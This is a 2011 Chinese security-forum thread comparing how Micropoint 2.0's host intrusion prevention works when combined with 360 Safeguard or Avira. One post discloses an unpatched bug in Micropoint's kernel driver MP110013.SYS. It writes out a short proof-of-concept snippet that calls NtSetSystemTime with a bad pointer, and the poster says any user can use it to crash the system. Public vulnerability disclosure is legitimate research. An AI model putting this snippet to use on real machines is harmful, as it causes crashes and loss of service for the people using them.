实测微点主防 2.0搭配360安全卫士 不会引起漏毒！已更新最新截图（召唤 MJ 进来科普）

ywsuda

要那么多主防干什么

zengjian96

回复 24楼 z2009 的帖子

我现在就是微点搭配360的~可不可以告诉我，微点和什么安软搭配好？

z2009

zengjian96 发表于 2011-4-23 20:18
回复 24楼 z2009 的帖子

我现在就是微点搭配360的~可不可以告诉我，微点和什么安软搭配好？

微点主打主防，360卫士靠的也是主防，但是360的主防没有微点的好，所以有微点的情况下，不需要360卫士了
建议搭配小红伞，高启发配主防，你觉得还有安全问题吗？

zengjian96

z2009 发表于 2011-4-23 20:39
微点主打主防，360卫士靠的也是主防，但是360的主防没有微点的好，所以有微点的情况下，不需要360卫士了
...

那么是不是要，额~阉割掉红伞？还有，我用F版的红伞可以吗？

z2009

zengjian96 发表于 2011-4-23 20:56
那么是不是要，额~阉割掉红伞？还有，我用F版的红伞可以吗？

我用红伞的p版，不用wg，mg和主防

zengjian96

z2009 发表于 2011-4-23 20:58
我用红伞的p版，不用wg，mg和主防

这样啊，谢谢你，学习了、

Tron

fzq198776 发表于 2011-4-21 23:02
微点 2.0 版 你看了没有？？ 貌似此版本 hook 的比较早啊

看了下2.0，驱动还是那几个驱动，钩子还是那几个位置，驱动还是那么挫，钩子还是那么脆弱，真正是换汤不换药，真当还是买软件的年代，换个界面加个版本号就有人买单了？
当然，微点的钩子还是那么靠后，那么容易被无视，不存在主楼所说的，不被HIPS影响

就连我一年前报告的0DAY漏洞，也没修补，悲剧：

http://www.wooyun.org/bugs/wooyun-2010-0383

这个漏洞当时在MP110013.SYS 的1.2.10581.0296及以下的微点都生效

如今mp110013.sys也已经提升版本号到2.0.10243.0了， 数字签名也装模作样地打到了4月22号，可是这个漏洞还是没修补， 4行代码就溢出微点的内核漏洞



PVOID p = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtSetSystemTime");



__asm

{

push 0x7ffef000

push 0x7ffef000

call p

}


测试程序见附件，通杀所有版本微点，装了微点的机器上，任意权限用户运行后系统立即崩溃，不装就没事

Tron

z2009 发表于 2011-4-23 20:39
微点主打主防，360卫士靠的也是主防，但是360的主防没有微点的好，所以有微点的情况下，不需要360卫士了
...

别搞笑了，微点主防比360差远了，早已落后360主防至少两年了，2.0也是换汤不换药，没什么增强，距离360远着呢， 47楼就是很好的证据

fzq198776

Tron 发表于 2011-4-24 06:47
看了下2.0，驱动还是那几个驱动，钩子还是那几个位置，驱动还是那么挫，钩子还是那么脆弱，真正是换汤不换 ...

MJ，这话可要负责，我可是转到 微点区 去了

另外 NIS2011的 sonar 每次拦截都是在 360 主防之前。。。

michaelchina

回复 47楼 Tron 的帖子

这个运行后直接蓝屏，微点的防御机制我是不太看好